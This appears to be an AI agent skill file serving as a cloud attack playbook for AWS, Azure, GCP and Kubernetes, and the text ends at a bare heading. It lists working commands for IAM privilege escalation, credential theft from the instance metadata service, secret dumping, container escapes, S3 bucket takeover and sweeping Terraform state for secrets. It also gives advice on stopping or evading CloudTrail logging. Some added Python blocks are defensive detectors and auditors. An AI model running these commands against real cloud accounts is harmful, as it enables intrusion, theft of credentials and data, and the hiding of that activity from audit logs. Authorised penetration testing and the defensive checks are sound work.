Cloud Security & Attack
When to Activate
- Cloud infrastructure penetration testing
- AWS/Azure/GCP privilege escalation
- Container and Kubernetes security assessment
- Serverless function exploitation
- IaC (Terraform/CloudFormation) security review
- Cloud credential abuse and lateral movement
AWS Attacks
Initial Enumeration
# Caller identity
aws sts get-caller-identity
# Account enumeration
aws iam list-users
aws iam list-roles
aws iam list-policies --only-attached
aws iam get-account-authorization-details # full dump
# S3 enumeration
aws s3 ls
aws s3 ls s3://bucket-name --recursive
aws s3api get-bucket-acl --bucket bucket-name
aws s3api get-bucket-policy --bucket bucket-name
# EC2
aws ec2 describe-instances --query 'Reservations[].Instances[].[InstanceId,State.Name,PublicIpAddress,IamInstanceProfile.Arn]'
# Lambda
aws lambda list-functions
aws lambda get-function --function-name NAME # includes download link
aws lambda get-policy --function-name NAME
Privilege Escalation
# Pacu (automated AWS exploitation)
pacu
> import_keys --all
> run iam__enum_permissions
> run iam__privesc_scan
> run iam__bruteforce_permissions
# Common privesc paths:
# iam:CreatePolicyVersion → create admin policy version
# iam:SetDefaultPolicyVersion → activate old permissive version
# iam:AttachUserPolicy → attach AdministratorAccess
# iam:CreateLoginProfile → create console password for any user
# iam:UpdateLoginProfile → change any user's password
# iam:PassRole + lambda:CreateFunction → create Lambda with admin role
# iam:PassRole + ec2:RunInstances → launch EC2 with admin role
# sts:AssumeRole → assume cross-account admin role
# lambda:UpdateFunctionCode → inject code into existing Lambda
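The paths above are combinations of allowed actions, so the fastest first pass over a dumped account is to evaluate each policy document against that list. The following is an added example, not code from the page or from Pacu: it matches IAM actions the way IAM does (case-insensitive wildcards, explicit Deny wins, NotAction handled) and reports which of the listed paths a policy enables. SAMPLE_POLICY is a constructed policy; Resource and Condition are deliberately not evaluated, so the result is an upper bound to confirm by hand.

```python
"""Check an IAM policy document for the privilege-escalation permission
combinations listed above (added example, not the page's own tooling).
SAMPLE_POLICY is a constructed policy used as input."""
import fnmatch
import json

# Each path maps to the action(s) that must all be allowed for it to work.
# Actually running the new Lambda additionally needs lambda:InvokeFunction
# or an event source; the table follows the page and lists the core pair.
PRIVESC_PATHS = {
    "CreatePolicyVersion": ("iam:CreatePolicyVersion",),
    "SetDefaultPolicyVersion": ("iam:SetDefaultPolicyVersion",),
    "AttachUserPolicy": ("iam:AttachUserPolicy",),
    "CreateLoginProfile": ("iam:CreateLoginProfile",),
    "UpdateLoginProfile": ("iam:UpdateLoginProfile",),
    "PassRole+CreateFunction": ("iam:PassRole", "lambda:CreateFunction"),
    "PassRole+RunInstances": ("iam:PassRole", "ec2:RunInstances"),
    "UpdateFunctionCode": ("lambda:UpdateFunctionCode",),
}


def _as_list(value):
    """IAM allows a string or a list in most fields; normalise to a list."""
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def _matches(pattern, action):
    """IAM action matching is case-insensitive with * and ? wildcards."""
    return fnmatch.fnmatchcase(action.lower(), pattern.lower())


def allowed_actions(policy, candidates):
    """Return the subset of `candidates` the policy allows.
    An Allow statement (Action or NotAction) must cover the action and no
    Deny statement may cover it: explicit Deny always wins. Resource and
    Condition are not evaluated; they can only narrow the result, so what
    comes back is an upper bound that still needs a manual look."""
    allow, deny = set(), set()
    for stmt in _as_list(policy.get("Statement")):
        if "NotAction" in stmt:
            patterns = _as_list(stmt["NotAction"])
            hits = {a for a in candidates
                    if not any(_matches(p, a) for p in patterns)}
        else:
            patterns = _as_list(stmt.get("Action"))
            hits = {a for a in candidates
                    if any(_matches(p, a) for p in patterns)}
        (allow if stmt.get("Effect") == "Allow" else deny).update(hits)
    return allow - deny


def find_privesc_paths(policy):
    """Names of the paths above whose actions are all allowed, sorted."""
    wanted = {a for actions in PRIVESC_PATHS.values() for a in actions}
    granted = allowed_actions(policy, wanted)
    return sorted(name for name, actions in PRIVESC_PATHS.items()
                  if all(a in granted for a in actions))


def scan_authorization_details(details):
    """Run the check over the default version of every managed policy in
    `aws iam get-account-authorization-details` output (the CLI embeds
    each Document as a JSON object). Returns {policy name: [paths]}."""
    hits = {}
    for pol in details.get("Policies", []):
        for version in pol.get("PolicyVersionList", []):
            if version.get("IsDefaultVersion"):
                paths = find_privesc_paths(version["Document"])
                if paths:
                    hits[pol["PolicyName"]] = paths
    return hits


# Constructed sample: a "developer" policy that looks scoped but still
# chains iam:PassRole with lambda:CreateFunction and leaves iam:Create*
# open apart from an explicit Deny on CreatePolicyVersion.
SAMPLE_POLICY = {
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow",
         "Action": ["iam:PassRole", "lambda:*", "iam:Create*"],
         "Resource": "*"},
        {"Effect": "Deny",
         "Action": "iam:CreatePolicyVersion",
         "Resource": "*"},
    ],
}

if __name__ == "__main__":
    print(json.dumps(find_privesc_paths(SAMPLE_POLICY), indent=2))
    # Real use: aws iam get-account-authorization-details > auth.json
    # then scan_authorization_details(json.load(open("auth.json")))
```

Run it directly to see the three paths the sample policy opens; feed it the `get-account-authorization-details` dump from the enumeration step to cover every customer-managed policy at once. Inline user and role policies live under `UserDetailList[].UserPolicyList` and `RoleDetailList[].RolePolicyList` in that dump and can be passed to `find_privesc_paths` the same way.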
# SSRF to IMDS
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/ROLE_NAME
# Returns: AccessKeyId, SecretAccessKey, Token
Post-Exploitation
# Secrets Manager / Parameter Store
aws secretsmanager list-secrets
aws secretsmanager get-secret-value --secret-id NAME
aws ssm get-parameters-by-path --path "/" --recursive --with-decryption
# RDS snapshots (public)
aws rds describe-db-snapshots --snapshot-type public
# CloudTrail disruption (stealth)
aws cloudtrail describe-trails # check IsMultiRegionTrail / IsOrganizationTrail: those trails cover every region
aws cloudtrail stop-logging --name trail-name # LOUD but effective: StopLogging is itself recorded and GuardDuty raises Stealth:IAMUser/CloudTrailLoggingDisabled
# Quieter: operate in regions a single-region trail does not cover, and prefer data-plane calls
# (S3 GetObject, Lambda Invoke, DynamoDB item reads) that are only recorded if data events were enabled on the trail
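The defender's view of the calls above: every one of them is a management event, so a trail that survives long enough to ship the record gives detection a clean signal. The following is an added example, not code from the page or from any vendor; it parses newline-delimited CloudTrail records and flags the trail-tampering calls, keeping denied attempts because a failed StopLogging is still someone testing their permissions. SAMPLE_LOG is constructed, not real CloudTrail output.

```python
"""Flag CloudTrail management events that stop, delete or narrow a trail.
Added example; SAMPLE_LOG is constructed, not real CloudTrail output."""
import json
from collections import Counter

# Calls that stop, delete or narrow a trail. DescribeTrails is recon only
# and stays out so the rule does not fire on every routine audit.
TRAIL_TAMPERING = {
    "StopLogging": "logging stopped",
    "DeleteTrail": "trail deleted",
    "UpdateTrail": "trail reconfigured",
    "PutEventSelectors": "event selectors changed",
}


def suspicious_events(lines):
    """Parse newline-delimited CloudTrail records and return one finding per
    tampering call. Denied attempts are kept and marked by `outcome`."""
    findings = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        rec = json.loads(line)
        if rec.get("eventSource") != "cloudtrail.amazonaws.com":
            continue
        name = rec.get("eventName")
        if name not in TRAIL_TAMPERING:
            continue
        params = rec.get("requestParameters") or {}
        why = TRAIL_TAMPERING[name]
        # UpdateTrail that drops multi-region coverage is the quiet variant
        if name == "UpdateTrail" and params.get("isMultiRegionTrail") is False:
            why += " (multi-region coverage removed)"
        findings.append({
            "time": rec.get("eventTime"),
            "actor": (rec.get("userIdentity") or {}).get("arn"),
            "source_ip": rec.get("sourceIPAddress"),
            "event": name,
            "trail": params.get("name") or params.get("trailName"),
            "outcome": rec.get("errorCode", "Success"),
            "why": why,
        })
    return findings


def by_actor(findings):
    """Count tampering calls per principal ARN, for triage ordering."""
    return dict(Counter(f["actor"] for f in findings))


# Constructed sample: one benign DescribeTrails, four tampering calls
# (one of them denied, from a different principal) and an unrelated S3 read.
SAMPLE_LOG = """
{"eventTime":"2024-05-01T10:00:00Z","eventSource":"cloudtrail.amazonaws.com","eventName":"DescribeTrails","userIdentity":{"arn":"arn:aws:iam::123456789012:user/dev"},"sourceIPAddress":"203.0.113.10","requestParameters":null}
{"eventTime":"2024-05-01T10:00:05Z","eventSource":"cloudtrail.amazonaws.com","eventName":"StopLogging","userIdentity":{"arn":"arn:aws:iam::123456789012:user/dev"},"sourceIPAddress":"203.0.113.10","requestParameters":{"name":"arn:aws:cloudtrail:us-east-1:123456789012:trail/org-trail"}}
{"eventTime":"2024-05-01T10:01:12Z","eventSource":"cloudtrail.amazonaws.com","eventName":"UpdateTrail","userIdentity":{"arn":"arn:aws:iam::123456789012:user/dev"},"sourceIPAddress":"203.0.113.10","requestParameters":{"name":"org-trail","isMultiRegionTrail":false}}
{"eventTime":"2024-05-01T10:02:40Z","eventSource":"cloudtrail.amazonaws.com","eventName":"DeleteTrail","userIdentity":{"arn":"arn:aws:sts::123456789012:assumed-role/Deploy/ci"},"sourceIPAddress":"198.51.100.7","requestParameters":{"name":"org-trail"},"errorCode":"AccessDenied"}
{"eventTime":"2024-05-01T10:03:01Z","eventSource":"cloudtrail.amazonaws.com","eventName":"PutEventSelectors","userIdentity":{"arn":"arn:aws:iam::123456789012:user/dev"},"sourceIPAddress":"203.0.113.10","requestParameters":{"trailName":"org-trail","eventSelectors":[{"readWriteType":"WriteOnly","includeManagementEvents":true}]}}
{"eventTime":"2024-05-01T10:04:00Z","eventSource":"s3.amazonaws.com","eventName":"GetObject","userIdentity":{"arn":"arn:aws:iam::123456789012:user/dev"},"sourceIPAddress":"203.0.113.10","requestParameters":{"bucketName":"corp-logs"}}
"""

if __name__ == "__main__":
    for f in suspicious_events(SAMPLE_LOG.splitlines()):
        print(f"{f['time']} {f['event']:18} {f['outcome']:12} {f['actor']}  {f['why']}")
    print(by_actor(suspicious_events(SAMPLE_LOG.splitlines())))
```

Real trail files are gzipped JSON with the records under a top-level `Records` array rather than one record per line; iterate that array and pass each record through `json.dumps` (or refactor `suspicious_events` to take dicts) and the logic is unchanged. The same shape works for GuardDuty tampering (`guardduty.amazonaws.com` with DeleteDetector / UpdateDetector) if you extend the table.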
Azure Attacks
Enumeration
# Azure AD enumeration
az ad user list
az ad group list
az ad app list
az role assignment list --all
# Resource enumeration
az resource list
az vm list
az storage account list
az keyvault list
# Token from IMDS
curl -H "Metadata: true" "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/"
Privilege Escalation
# Managed Identity abuse
# Any code running on a resource that has a managed identity (VM, App Service, Function, Automation runbook) can ask IMDS
# for tokens scoped to other audiences (management.azure.com, vault.azure.net, graph.microsoft.com) and use whatever RBAC that identity holds
# Automation Account RunAs (legacy, retired in favour of managed identities, still found in older tenants)
# Extract the RunAs certificate from the automation account → authenticate as its service principal (historically Contributor on the subscription)
# Key Vault access
az keyvault secret list --vault-name VAULT
az keyvault secret show --vault-name VAULT --name SECRET
# Azure AD Connect (on-prem sync)
# Extract the sync account credentials from the ADSync database on the Connect server → the MSOL_ account holds replication rights on-prem → DCSync
# Consent grant attack
# Illicit consent: trick a user (or admin) into granting an attacker-registered app delegated permissions
# e.g. Mail.Read, Files.ReadWrite.All; tenant-wide application permissions need an admin's consent
GCP Attacks
# Service account enumeration
gcloud iam service-accounts list
gcloud projects get-iam-policy PROJECT_ID
# Metadata server
curl -H "Metadata-Flavor: Google" http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token
# Privilege escalation
# iam.serviceAccountKeys.create → create key for any SA
# iam.serviceAccounts.actAs → impersonate service account
# compute.instances.setMetadata → add SSH key to any VM
# deploymentmanager.deployments.create → deploy as project editor
# Storage bucket enumeration
gsutil ls
gsutil ls gs://bucket-name
gsutil cp gs://bucket-name/secret.txt .
Kubernetes Attacks
Enumeration
# Check permissions
kubectl auth can-i --list
kubectl get secrets --all-namespaces
kubectl get pods --all-namespaces
# Service account token
cat /var/run/secrets/kubernetes.io/serviceaccount/token
# Use with: kubectl --token=$TOKEN --server=https://kubernetes.default.svc
# API server direct
curl -k https://kubernetes.default.svc/api/v1/namespaces/default/secrets \
-H "Authorization: Bearer $TOKEN"
Exploitation
# Privileged pod escape
# privileged + hostPID: PID 1 is the host's init, so enter its namespaces
nsenter --target 1 --mount --uts --ipc --net --pid -- /bin/bash
# privileged without hostPID: PID 1 is the container's own init and nsenter goes nowhere;
# mount the host's root block device instead (Container Escape, below)
# Pod with hostPID/hostNetwork
# hostPID: the node's process list is visible, including secrets passed on the command line (/proc/<pid>/cmdline is world-readable)
# hostNetwork: the pod sits on the node's network stack, so node-local services such as the kubelet API on 10250 are reachable
# Writable hostPath mount
# Write to /etc/cron.d/ on host, or append a key to /root/.ssh/authorized_keys
# Peirates (k8s pentesting tool; interactive numbered menu rather than subcommands):
# dumps service account tokens and secrets, tries privileged/hostPath escapes, pivots with harvested tokens
peirates
Container Escape
# Docker socket mounted
docker -H unix:///var/run/docker.sock run -v /:/host -it alpine chroot /host
# Privileged container: mount the host's root block device (device name varies, e.g. nvme0n1p1 on Nitro instances; list with fdisk -l or lsblk)
mount /dev/sda1 /mnt
chroot /mnt
# CVE-based escapes
# CVE-2019-5736 (runc): overwrite the host runc binary through /proc/self/exe when an operator execs into the container
# CVE-2020-15257 (containerd-shim): abstract unix socket reachable from a hostNetwork container
# CVE-2022-0185 (Linux kernel fs_context): heap overflow in legacy_parse_param, reachable with CAP_SYS_ADMIN inside an unprivileged user namespace
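Every escape in the Exploitation and Container Escape sections depends on a handful of pod settings (privileged, hostPID/hostNetwork, added capabilities, hostPath mounts of the node root or the Docker socket), so the same checklist serves both the attacker looking for a foothold and the reviewer auditing a cluster. The following is an added example, not code from the page or from Peirates: it audits pod objects in the JSON shape `kubectl get pods -A -o json` returns. Both manifests are constructed.

```python
"""Audit pod specs for the settings the escapes above rely on.
Added example, not from the page or any project; the manifests are constructed."""

# Host paths that hand over the node when mounted writable (or at all).
DANGEROUS_HOST_PATHS = ("/", "/var/run/docker.sock", "/run/docker.sock",
                        "/etc", "/root", "/var/lib/kubelet", "/proc")
# Capabilities that make a non-privileged container nearly equivalent to root on the node.
DANGEROUS_CAPS = {"SYS_ADMIN", "SYS_PTRACE", "SYS_MODULE", "NET_ADMIN", "DAC_READ_SEARCH"}


def _host_path_hit(path):
    """True if `path` is the host root, a listed path, or a subpath of one."""
    norm = "/" + path.strip("/")
    if norm == "/":
        return True
    for bad in DANGEROUS_HOST_PATHS:
        bad = "/" + bad.strip("/")
        if bad != "/" and (norm == bad or norm.startswith(bad + "/")):
            return True
    return False


def audit_pod(pod):
    """Findings for one pod object (`kubectl get pod NAME -o json`).
    An empty list means none of the escape-enabling settings are present."""
    spec = pod.get("spec") or {}
    name = (pod.get("metadata") or {}).get("name", "<unnamed>")
    findings = []
    for flag in ("hostPID", "hostNetwork", "hostIPC"):
        if spec.get(flag):
            findings.append(f"{name}: {flag}=true")
    # hostPath volumes by volume name, so mounts can be resolved per container
    host_vols = {v["name"]: (v["hostPath"] or {}).get("path", "")
                 for v in spec.get("volumes") or [] if "hostPath" in v}
    for c in (spec.get("containers") or []) + (spec.get("initContainers") or []):
        sc = c.get("securityContext") or {}
        if sc.get("privileged"):
            findings.append(f"{name}/{c['name']}: privileged=true")
        caps = set((sc.get("capabilities") or {}).get("add") or [])
        if caps & DANGEROUS_CAPS:
            findings.append(f"{name}/{c['name']}: adds {sorted(caps & DANGEROUS_CAPS)}")
        for m in c.get("volumeMounts") or []:
            hp = host_vols.get(m["name"])
            if hp is not None and _host_path_hit(hp):
                mode = "ro" if m.get("readOnly") else "rw"
                findings.append(f"{name}/{c['name']}: hostPath {hp} mounted {mode} at {m['mountPath']}")
    return findings


def audit_pod_list(pod_list):
    """Audit `kubectl get pods -A -o json` output (a List with .items)."""
    return [f for pod in pod_list.get("items") or [] for f in audit_pod(pod)]


# Constructed: a "debug" pod with every escape path, and a plain web pod.
BAD_POD = {
    "metadata": {"name": "debug", "namespace": "default"},
    "spec": {
        "hostPID": True, "hostNetwork": True,
        "volumes": [{"name": "host-root", "hostPath": {"path": "/"}},
                    {"name": "docker-sock", "hostPath": {"path": "/var/run/docker.sock"}}],
        "containers": [{
            "name": "shell", "image": "alpine",
            "securityContext": {"privileged": True, "capabilities": {"add": ["SYS_ADMIN"]}},
            "volumeMounts": [{"name": "host-root", "mountPath": "/host"},
                             {"name": "docker-sock", "mountPath": "/var/run/docker.sock"}],
        }],
    },
}
SAFE_POD = {
    "metadata": {"name": "web", "namespace": "default"},
    "spec": {
        "volumes": [{"name": "cache", "emptyDir": {}}],
        "containers": [{"name": "nginx", "image": "nginx",
                        "securityContext": {"runAsNonRoot": True},
                        "volumeMounts": [{"name": "cache", "mountPath": "/cache"}]}],
    },
}

if __name__ == "__main__":
    for line in audit_pod_list({"items": [BAD_POD, SAFE_POD]}):
        print(line)
```

Pipe the cluster's pod list through `audit_pod_list` to find the pods worth exec'ing into first; a `ro` hostPath of `/` still reads kubelet credentials and every other pod's secrets from the node, so read-only is a lesser finding, not a pass.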
IaC Security Review
Terraform Misconfigurations
# Dangerous patterns to flag:
# - Security groups with 0.0.0.0/0 ingress
# - S3 buckets without encryption or public access block
# - IAM policies with "*" actions/resources
# - RDS instances publicly accessible
# - CloudTrail logging disabled
# - KMS keys without rotation
# - Lambda functions with admin roles
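The patterns above are easiest to check mechanically on the JSON plan (`terraform plan -out p.tfplan && terraform show -json p.tfplan`) rather than on raw HCL, because the plan has already resolved variables and module calls. The following is an added example, not the page's code nor checkov's or tfsec's: it walks `planned_values` (including child modules) and reports each listed pattern, cross-referencing a Lambda's execution role against AdministratorAccess attachments. SAMPLE_PLAN is a constructed, trimmed plan using the aws provider's attribute names.

```python
"""Flag the Terraform patterns listed above from `terraform show -json` output.
Added example, not from the page or any scanner; SAMPLE_PLAN is constructed."""
import json


def _iter_resources(module):
    """Walk planned_values.root_module and every nested child_module."""
    for res in module.get("resources") or []:
        yield res
    for child in module.get("child_modules") or []:
        yield from _iter_resources(child)


def _wildcard_statement(policy_json):
    """True if any Allow statement grants Action "*" (or "*:*") on Resource "*"."""
    try:
        doc = json.loads(policy_json)
    except (TypeError, ValueError):
        return False  # policy unknown at plan time or not JSON
    stmts = doc.get("Statement") or []
    for s in (stmts if isinstance(stmts, list) else [stmts]):
        if s.get("Effect") != "Allow":
            continue
        actions = s.get("Action") or []
        actions = actions if isinstance(actions, list) else [actions]
        resources = s.get("Resource") or []
        resources = resources if isinstance(resources, list) else [resources]
        if any(a in ("*", "*:*") for a in actions) and "*" in resources:
            return True
    return False


def check_plan(plan):
    """Return [(resource address, finding)] for the dangerous patterns."""
    findings = []
    resources = list(_iter_resources((plan.get("planned_values") or {}).get("root_module") or {}))
    # Buckets that get a public access block, and role names used by Lambda functions
    pab_buckets = {(r.get("values") or {}).get("bucket") for r in resources
                   if r["type"] == "aws_s3_bucket_public_access_block"}
    lambda_roles = {((r.get("values") or {}).get("role") or "").rsplit("/", 1)[-1]
                    for r in resources if r["type"] == "aws_lambda_function"}
    for r in resources:
        t, addr, v = r["type"], r["address"], r.get("values") or {}
        if t == "aws_security_group":
            for rule in v.get("ingress") or []:
                if "0.0.0.0/0" in (rule.get("cidr_blocks") or []) or "::/0" in (rule.get("ipv6_cidr_blocks") or []):
                    findings.append((addr, f"ingress from the world on ports {rule.get('from_port')}-{rule.get('to_port')}"))
        elif t == "aws_security_group_rule" and v.get("type") == "ingress":
            if "0.0.0.0/0" in (v.get("cidr_blocks") or []):
                findings.append((addr, "ingress rule from the world"))
        elif t == "aws_s3_bucket" and v.get("bucket") not in pab_buckets:
            findings.append((addr, "no aws_s3_bucket_public_access_block for this bucket"))
        elif t in ("aws_iam_policy", "aws_iam_role_policy", "aws_iam_user_policy") and _wildcard_statement(v.get("policy")):
            findings.append((addr, 'policy allows Action "*" on Resource "*"'))
        elif t == "aws_db_instance" and v.get("publicly_accessible"):
            findings.append((addr, "RDS instance publicly accessible"))
        elif t == "aws_cloudtrail" and v.get("enable_logging") is False:
            findings.append((addr, "CloudTrail logging disabled"))
        elif t == "aws_kms_key" and not v.get("enable_key_rotation"):
            findings.append((addr, "KMS key rotation off"))
        elif t == "aws_iam_role_policy_attachment":
            if (v.get("policy_arn") or "").endswith("/AdministratorAccess") and v.get("role") in lambda_roles:
                findings.append((addr, f"AdministratorAccess attached to Lambda execution role {v.get('role')}"))
    return findings


# Constructed plan: one instance of each pattern, with the trail in a child module.
SAMPLE_PLAN = {"planned_values": {"root_module": {
    "resources": [
        {"address": "aws_security_group.ssh", "type": "aws_security_group",
         "values": {"ingress": [{"from_port": 22, "to_port": 22, "cidr_blocks": ["0.0.0.0/0"], "ipv6_cidr_blocks": []}]}},
        {"address": "aws_s3_bucket.logs", "type": "aws_s3_bucket", "values": {"bucket": "corp-logs"}},
        {"address": "aws_s3_bucket.assets", "type": "aws_s3_bucket", "values": {"bucket": "corp-assets"}},
        {"address": "aws_s3_bucket_public_access_block.assets", "type": "aws_s3_bucket_public_access_block",
         "values": {"bucket": "corp-assets", "block_public_acls": True}},
        {"address": "aws_iam_role_policy.lambda", "type": "aws_iam_role_policy",
         "values": {"policy": json.dumps({"Version": "2012-10-17", "Statement": [{"Effect": "Allow", "Action": "*", "Resource": "*"}]})}},
        {"address": "aws_db_instance.main", "type": "aws_db_instance", "values": {"publicly_accessible": True}},
        {"address": "aws_kms_key.data", "type": "aws_kms_key", "values": {"enable_key_rotation": False}},
        {"address": "aws_lambda_function.worker", "type": "aws_lambda_function",
         "values": {"role": "arn:aws:iam::123456789012:role/worker-role"}},
        {"address": "aws_iam_role_policy_attachment.worker_admin", "type": "aws_iam_role_policy_attachment",
         "values": {"role": "worker-role", "policy_arn": "arn:aws:iam::aws:policy/AdministratorAccess"}},
    ],
    "child_modules": [{"address": "module.trail", "resources": [
        {"address": "module.trail.aws_cloudtrail.main", "type": "aws_cloudtrail", "values": {"enable_logging": False}}]}],
}}}

if __name__ == "__main__":
    for addr, msg in check_plan(SAMPLE_PLAN):
        print(f"{addr}: {msg}")
```

Values that are only known after apply (a bucket name built from a random suffix, a role ARN from another module) show up as missing keys in `planned_values` and fall through these checks silently; treat an unexpectedly short finding list as a reason to also run the scan against the state after apply. The bucket encryption check from the list above is omitted on purpose: with provider v4+ it lives in a separate `aws_s3_bucket_server_side_encryption_configuration` resource and follows the same cross-reference pattern as the public access block.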
Tools
# Automated scanning
prowler aws --severity critical high
scout aws # ScoutSuite's entry point is `scout`, not `scoutsuite`
trivy config ./terraform/
checkov -d ./terraform/
tfsec ./terraform/
Advanced: AWS Exploitation Chains
IMDSv2 Bypass
# IMDSv2 requires a session token: PUT /latest/api/token with a TTL header, then GET with the token.
# The PUT response carrying the token leaves the metadata service with IP TTL (hop limit) 1 by default, so it dies at
# the first router hop (a Docker bridge, a NAT). Anything running directly on the instance is not behind a hop and
# still gets the token: a full RCE, or an SSRF primitive that can send PUT with a custom header.
TOKEN=$(curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600")
curl -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/meta-data/iam/security-credentials/
# If the instance's MetadataOptions still has HttpTokens=optional, IMDSv1 is accepted as well and the plain GET from the
# Privilege Escalation section works with no token at all.
# DNS rebinding does not defeat the hop limit or the PUT requirement; it defeats SSRF hostname allowlists:
# the filter resolves attacker-controlled name to a public IP and approves it, the HTTP client re-resolves (short TTL)
# and connects to 169.254.169.254. That reaches IMDSv1 with a plain GET, but a GET-only SSRF still cannot
# complete the IMDSv2 token handshake.
Lambda → IAM Role Chaining
# Lambda function with iam:PassRole + lambda:CreateFunction
# Create new Lambda with more privileged role; payload.zip holds index.py whose handler() reads the role's temporary
# credentials from AWS_ACCESS_KEY_ID / AWS_SECRET_ACCESS_KEY / AWS_SESSION_TOKEN in the function environment and
# returns or exfiltrates them. Running it also needs lambda:InvokeFunction (or an event source you can trigger).
aws lambda create-function \
--function-name escalate \
--runtime python3.11 \
--role arn:aws:iam::ACCOUNT:role/AdminRole \
--handler index.handler \
--zip-file fileb://payload.zip
# Lambda → STS → Cross-account assume
# Only works if the target role's trust policy names your principal or account; read trust policies with iam get-role
aws sts assume-role --role-arn arn:aws:iam::TARGET_ACCOUNT:role/CrossAccountRole \
--role-session-name pwned
S3 Confused Deputy
# Several AWS services write into a customer-named bucket (CloudTrail, ELB/CloudFront access logs, AWS Config, ...)
# If the bucket a victim's configuration names does not exist (deleted, mistyped, or predictable from a naming scheme),
# create it in your own account: the service principal then writes the victim's data into your bucket
# Defence: bucket policies that condition the service principal on aws:SourceAccount / aws:SourceArn
# S3 bucket takeover via dangling CNAME
# 1. Find CNAME pointing to deleted S3 bucket (bucket names are global, so a deleted name is free to claim)
# 2. Create bucket with same name (any region)
# 3. Serve malicious content on victim's subdomain
dig +short subdomain.target.com CNAME
# Returns e.g. target-bucket.s3.amazonaws.com; an HTTP request to it answers NoSuchBucket
aws s3 mb s3://target-bucket
CloudFormation/Terraform State Exploitation
# Terraform state stores every resource attribute in plaintext, generated passwords and private keys included;
# `sensitive = true` only redacts plan/apply output, not the state. Check bucket versioning too: older state versions keep rotated secrets
aws s3 cp s3://terraform-state-bucket/prod/terraform.tfstate .
jq '.resources[].instances[].attributes | select(.password != null)' terraform.tfstate
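The jq one-liner only catches a top-level `password` attribute; secrets in state also sit in nested blocks, under other names (`secret`, `private_key_pem`, connection strings), and in values that are recognisable by format rather than by key. The following is an added example, not the page's code: it walks every attribute of every instance in a state file, flags sensitive-looking keys and well-known key formats, and honours the `sensitive_attributes` list that state format v4 records for each instance. SAMPLE_STATE is constructed (the AKIA example key is AWS's documentation placeholder).

```python
"""Walk a Terraform state file and report secret-bearing attributes.
Added example, not the page's code; SAMPLE_STATE is constructed."""
import json
import re
import sys

# Attribute names that usually hold secrets (matched anywhere in the path)
SENSITIVE_KEY = re.compile(
    r"(password|secret|private_key|token|api_key|access_key|connection_string)", re.I)
# Values recognisable as secrets regardless of attribute name
SENSITIVE_VALUE = re.compile(
    r"^(AKIA[0-9A-Z]{16}|-----BEGIN [A-Z ]*PRIVATE KEY-----|ghp_[A-Za-z0-9]{36}|xox[bp]-)")


def _walk(obj, path=""):
    """Yield (dotted path, value) for every leaf of a nested attribute tree."""
    if isinstance(obj, dict):
        for k, v in obj.items():
            yield from _walk(v, f"{path}.{k}" if path else k)
    elif isinstance(obj, list):
        for i, v in enumerate(obj):
            yield from _walk(v, f"{path}[{i}]")
    else:
        yield path, obj


def _marked_sensitive(instance):
    """Top-level attribute names Terraform itself marked sensitive (state v4:
    a list of attribute paths, each a list of {"type": "get_attr", "value": name} steps)."""
    names = set()
    for entry in instance.get("sensitive_attributes") or []:
        for step in entry:
            if step.get("type") == "get_attr":
                names.add(step["value"])
    return names


def find_secrets(state):
    """Return [(resource address, attribute path, masked value)]."""
    hits = []
    for res in state.get("resources") or []:
        addr = ".".join(p for p in (res.get("module"), res["type"], res["name"]) if p)
        for inst in res.get("instances") or []:
            marked = _marked_sensitive(inst)
            for path, value in _walk(inst.get("attributes") or {}):
                if not isinstance(value, str) or not value:
                    continue
                top = path.split(".")[0].split("[")[0]
                if top in marked or SENSITIVE_KEY.search(path) or SENSITIVE_VALUE.match(value):
                    hits.append((addr, path, f"{value[:4]}...({len(value)} chars)"))
    return hits


# Constructed state: a DB password Terraform marked sensitive, an IAM access key
# pair, a private key inside a module, and an instance with nothing of interest.
SAMPLE_STATE = {
    "version": 4,
    "resources": [
        {"mode": "managed", "type": "aws_db_instance", "name": "main",
         "instances": [{"attributes": {"id": "db-prod", "password": "Sup3rS3cret!", "username": "admin",
                                       "tags": {"env": "prod"}},
                        "sensitive_attributes": [[{"type": "get_attr", "value": "password"}]]}]},
        {"mode": "managed", "type": "aws_iam_access_key", "name": "ci",
         "instances": [{"attributes": {"id": "AKIAIOSFODNN7EXAMPLE",
                                       "secret": "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY", "user": "ci"}}]},
        {"module": "module.vpn", "mode": "managed", "type": "tls_private_key", "name": "server",
         "instances": [{"attributes": {"algorithm": "RSA",
                                       "private_key_pem": "-----BEGIN RSA PRIVATE KEY-----\nMIIE...\n-----END RSA PRIVATE KEY-----\n",
                                       "public_key_openssh": "ssh-rsa AAAA..."}}]},
        {"mode": "managed", "type": "aws_instance", "name": "web",
         "instances": [{"attributes": {"id": "i-0abc", "tags": {"Name": "web"}}}]},
    ],
}

if __name__ == "__main__":
    state = json.load(open(sys.argv[1])) if len(sys.argv) > 1 else SAMPLE_STATE
    for addr, path, masked in find_secrets(state):
        print(f"{addr}  {path}  {masked}")
```

Run it as `python3 find_state_secrets.py terraform.tfstate` against the file pulled from the bucket; with no argument it runs on the constructed sample. The key-name heuristic over-reports on ARNs such as `secret_arn`, which is the right failure mode for an exfiltration sweep but worth filtering in a CI gate.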
# CloudFormation exports (cross-stack references)
aws cloudformation list-exports
# Often contains VPC IDs, subnet IDs, security group IDs, RDS endpoints
Cognito Identity Pool Misconfiguration